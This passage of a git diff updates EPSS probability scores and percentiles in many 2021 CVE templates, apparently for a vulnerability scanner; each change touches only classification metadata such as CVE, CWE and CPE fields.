cpe:2.3:a:kevinlab:4st_l-bems:1.0.0:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 882578ffdf3..55c2fddb0d3 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37305 cwe-id: CWE-732 epss-score: 0.5231 - epss-percentile: 0.97833 + epss-percentile: 0.97829 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 518aaeb312d..902c85acbab 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-37573 cwe-id: CWE-79 - epss-score: 0.18516 - epss-percentile: 0.95033 + epss-score: 0.28701 + epss-percentile: 0.96398 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index ed7dea251b3..811fad11b8e 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-37589 cwe-id: CWE-89 epss-score: 0.62985 - epss-percentile: 0.98321 + epss-percentile: 0.98323 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37598.yaml b/http/cves/2021/CVE-2021-37598.yaml index e6f64d5760c..661851fc57f 100644 --- a/http/cves/2021/CVE-2021-37598.yaml +++ b/http/cves/2021/CVE-2021-37598.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-37598 - epss-score: 0.07563 - epss-percentile: 0.91562 + epss-score: 0.03958 + epss-percentile: 0.88023 cwe-id: CWE-863 metadata: verified: false diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 617f241d6da..79077563f57 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-37704 cwe-id: CWE-668,CWE-200 epss-score: 0.47802 - epss-percentile: 0.97615 + epss-percentile: 0.9761 cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 7c70889073a..acd4f73bbbf 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-37833 cwe-id: CWE-79 epss-score: 0.05431 - epss-percentile: 0.89887 + epss-percentile: 0.89883 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml index 31ca84c8a50..0b09b212d0a 100644 --- a/http/cves/2021/CVE-2021-38146.yaml +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-38146 cwe-id: CWE-22 - epss-score: 0.45088 - epss-percentile: 0.97484 + epss-score: 0.37019 + epss-percentile: 0.97027 cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml index ea08e886656..6394ac2d3c9 100644 --- a/http/cves/2021/CVE-2021-38147.yaml +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-38147 cwe-id: CWE-306 epss-score: 0.63253 - epss-percentile: 0.98331 + epss-percentile: 0.98333 cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-38154.yaml b/http/cves/2021/CVE-2021-38154.yaml index 11b30c72c2a..96168007459 100644 --- a/http/cves/2021/CVE-2021-38154.yaml +++ b/http/cves/2021/CVE-2021-38154.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-38154 cwe-id: CWE-732 epss-score: 0.11868 - epss-percentile: 0.93522 + epss-percentile: 0.93515 cpe: cpe:2.3:h:canon:-:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3831.yaml b/http/cves/2021/CVE-2021-3831.yaml index 500da2adde1..7b480ed3348 100644 --- a/http/cves/2021/CVE-2021-3831.yaml +++ b/http/cves/2021/CVE-2021-3831.yaml @@ -19,7 +19,7 @@ info: cvss-score: 5.4 cve-id: CVE-2021-3831 epss-score: 0.26611 - epss-percentile: 0.96176 + epss-percentile: 0.96178 cwe-id: CWE-80 cpe: cpe:2.3:a:gnuboard:gnuboard5:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 8bc22e14be6..5f3f9aebad3 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-38647 cwe-id: CWE-287 epss-score: 0.94392 - epss-percentile: 0.9997 + epss-percentile: 0.99969 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index ac4bb55a0b2..40f438eddaf 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-38702 cwe-id: CWE-79 epss-score: 0.469 - epss-percentile: 0.97572 + epss-percentile: 0.97568 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index e72548b209b..cc57d0b1510 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-38704 cwe-id: CWE-79 epss-score: 0.09961 - epss-percentile: 0.92815 + epss-percentile: 0.92808 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index d649c9fda55..2616f07424c 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-38751 cwe-id: CWE-116 epss-score: 0.12877 - epss-percentile: 0.9383 + epss-percentile: 0.93826 cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml index b732cba29d8..20570ed9303 100644 --- a/http/cves/2021/CVE-2021-39141.yaml +++ b/http/cves/2021/CVE-2021-39141.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39141 cwe-id: CWE-434 epss-score: 0.84542 - epss-percentile: 0.99297 + epss-percentile: 0.99296 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index a9e26e0c69f..81593978d2a 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.54176 - epss-percentile: 0.97927 + epss-percentile: 0.97925 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 29f887861b1..45e33c5fe4b 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.67834 - epss-percentile: 0.98527 + epss-percentile: 0.98528 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index eb1c7224ff3..ab75de2b508 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39165 cwe-id: CWE-287 epss-score: 0.8938 - epss-percentile: 0.99526 + epss-percentile: 0.99528 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 08b9846c7ac..09a7db340e0 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39211 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.54404 - epss-percentile: 0.97937 + epss-percentile: 0.97934 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index 5b8a0197399..f003ab65c20 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39312 cwe-id: CWE-22 epss-score: 0.91056 - epss-percentile: 0.99621 + epss-percentile: 0.9962 cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index caaf7025e7d..28782b04f5e 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-39316 cwe-id: CWE-22 epss-score: 0.93526 - epss-percentile: 0.99816 + epss-percentile: 0.99818 cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 97d41ee2314..6695979b921 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39320 cwe-id: CWE-79 epss-score: 0.19664 - epss-percentile: 0.95234 + epss-percentile: 0.95232 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index cb68a98f8b7..94619b021f7 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-39322 cwe-id: CWE-79 epss-score: 0.13873 - epss-percentile: 0.94098 + epss-percentile: 0.94093 cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39341.yaml b/http/cves/2021/CVE-2021-39341.yaml index 24166e5a1ea..077eb17cb5b 100644 --- a/http/cves/2021/CVE-2021-39341.yaml +++ b/http/cves/2021/CVE-2021-39341.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39341 cwe-id: CWE-285,CWE-863 epss-score: 0.44317 - epss-percentile: 0.97441 + epss-percentile: 0.97437 cpe: cpe:2.3:a:optinmonster:optinmonster:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 060198ef431..71024f30949 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-39350 cwe-id: CWE-79 epss-score: 0.16614 - epss-percentile: 0.9471 + epss-percentile: 0.94708 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39411.yaml b/http/cves/2021/CVE-2021-39411.yaml index abfaec20a85..7a402a60651 100644 --- a/http/cves/2021/CVE-2021-39411.yaml +++ b/http/cves/2021/CVE-2021-39411.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.2 cve-id: CVE-2021-39411 epss-score: 0.01665 - epss-percentile: 0.81669 + epss-percentile: 0.81663 cwe-id: CWE-79 cpe: cpe:2.3:a:phptpoint:hospital_management_system:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 0cfa4d7bb4f..8d0971239ce 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39433 epss-score: 0.81123 - epss-percentile: 0.9912 + epss-percentile: 0.99122 cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 9b0b9cf96b0..706b01bb022 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-40150 cwe-id: CWE-552 epss-score: 0.34226 - epss-percentile: 0.96848 + epss-percentile: 0.9685 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40272.yaml b/http/cves/2021/CVE-2021-40272.yaml index a160bf2de74..909019ae260 100644 --- a/http/cves/2021/CVE-2021-40272.yaml +++ b/http/cves/2021/CVE-2021-40272.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40272 cwe-id: CWE-79 epss-score: 0.04872 - epss-percentile: 0.89249 + epss-percentile: 0.89247 cpe: cpe:2.3:a:op5:monitor:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 87423a696d9..57420a951c2 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40539 cwe-id: CWE-706 epss-score: 0.94424 - epss-percentile: 0.9998 + epss-percentile: 0.99979 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index dc1b9797805..32ce1f6dcf0 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-40542 cwe-id: CWE-79 epss-score: 0.25259 - epss-percentile: 0.9602 + epss-percentile: 0.96023 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 036a39dae3f..5987c7aab02 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40859 epss-score: 0.81279 - epss-percentile: 0.99128 + epss-percentile: 0.99131 cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index abf7e07a67a..8ab978a26c5 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40868 cwe-id: CWE-79 epss-score: 0.24386 - epss-percentile: 0.95928 + epss-percentile: 0.95933 cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 32b8877d997..411e3ab1ee5 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-40875 cwe-id: CWE-425 epss-score: 0.81108 - epss-percentile: 0.99117 + epss-percentile: 0.9912 cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 83619162436..d69554d0528 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40968 cwe-id: CWE-79 epss-score: 0.01286 - epss-percentile: 0.79207 + epss-percentile: 0.79203 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 0317b0e2635..443931802e8 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40969 cwe-id: CWE-79 epss-score: 0.01286 - epss-percentile: 0.79207 + epss-percentile: 0.79203 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 84bf46d2dcf..b1d6a8c8c63 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40970 cwe-id: CWE-79 epss-score: 0.01286 - epss-percentile: 0.79207 + epss-percentile: 0.79203 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index dbd91b8fd19..a56aa023644 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40971 cwe-id: CWE-79 epss-score: 0.01286 - epss-percentile: 0.79207 + epss-percentile: 0.79203 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 3d041fa66f8..1fe93d8b2bd 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40972 cwe-id: CWE-79 epss-score: 0.01286 - epss-percentile: 0.79207 + epss-percentile: 0.79203 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 567b7d29b80..4f8b56f5692 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40973 cwe-id: CWE-79 epss-score: 0.01286 - epss-percentile: 0.79207 + epss-percentile: 0.79203 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 4f602403dba..fba5640158d 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-41277 cwe-id: CWE-22,CWE-200 epss-score: 0.94408 - epss-percentile: 0.99975 + epss-percentile: 0.99974 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 28be38bf9f8..51b9ae0d9a2 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-41282 cwe-id: CWE-74 epss-score: 0.9188 - epss-percentile: 0.99675 + epss-percentile: 0.99674 cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index d86926b272b..235220293ce 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-41293 cwe-id: CWE-22 epss-score: 0.89647 - epss-percentile: 0.99538 + epss-percentile: 0.9954 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index cad6300da33..f60d4c35734 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-41349 - epss-score: 0.91327 - epss-percentile: 0.99636 + epss-score: 0.91744 + epss-percentile: 0.99665 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index e8c32cc4f72..3f5ae00de84 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-41460 cwe-id: CWE-89 epss-score: 0.2834 - epss-percentile: 0.96361 + epss-percentile: 0.96362 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index f83e40195ac..34f22507328 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-41467 cwe-id: CWE-79 epss-score: 0.0516 - epss-percentile: 0.89575 + epss-percentile: 0.89573 cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index 6cd5346b8e7..e3c99ad3ce1 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-41569 cwe-id: CWE-829 epss-score: 0.5477 - epss-percentile: 0.97955 + epss-percentile: 0.97954 cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 4a2d4d12562..4298abc9093 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-41649 cwe-id: CWE-89 epss-score: 0.9066 - epss-percentile: 0.99597 + epss-percentile: 0.99596 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index 28cc000d2df..5869098bdbf 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2021-41691 epss-score: 0.02472 - epss-percentile: 0.84867 + epss-percentile: 0.84863 metadata: max-request: 2 tags: cve,cve2021,sqli,auth,edb,opensis,vkev,vuln diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 5affc4be0ac..351402e70d0 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -22,8 +22,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41773 cwe-id: CWE-22 - epss-score: 0.94377 - epss-percentile: 0.99964 + epss-score: 0.94421 + epss-percentile: 0.99978 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index 972fe9d8e3b..0b650679c5d 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-41826 cwe-id: CWE-601 epss-score: 0.23963 - epss-percentile: 0.95852 + epss-percentile: 0.95856 cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 8bdd98bcc25..8c89d944c63 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-41878 cwe-id: CWE-79 epss-score: 0.0795 - epss-percentile: 0.918 + epss-percentile: 0.91797 cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 0240f9ea587..e2d8105959e 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -21,7 +21,7 @@ info: cve-id: "CVE-2021-42013" cwe-id: CWE-22 epss-score: 0.9441 - epss-percentile: 0.99975 + epss-percentile: 0.99974 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index b157bcf7802..2802dd0a33e 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-42192 cwe-id: CWE-863 epss-score: 0.24025 - epss-percentile: 0.95858 + epss-percentile: 0.95862 cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 0c333a86aa8..1276cc1f88e 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-42551 cwe-id: CWE-79 epss-score: 0.09561 - epss-percentile: 0.92617 + epss-percentile: 0.92611 cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index f319d5c95f6..c9abe6cf1a9 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-42565 cwe-id: CWE-79 epss-score: 0.00675 - epss-percentile: 0.70913 + epss-percentile: 0.70894 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 101f0cc3648..8cc7d538ba0 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42566 cwe-id: CWE-79 epss-score: 0.00675 - epss-percentile: 0.70913 + epss-percentile: 0.70894 cpe: 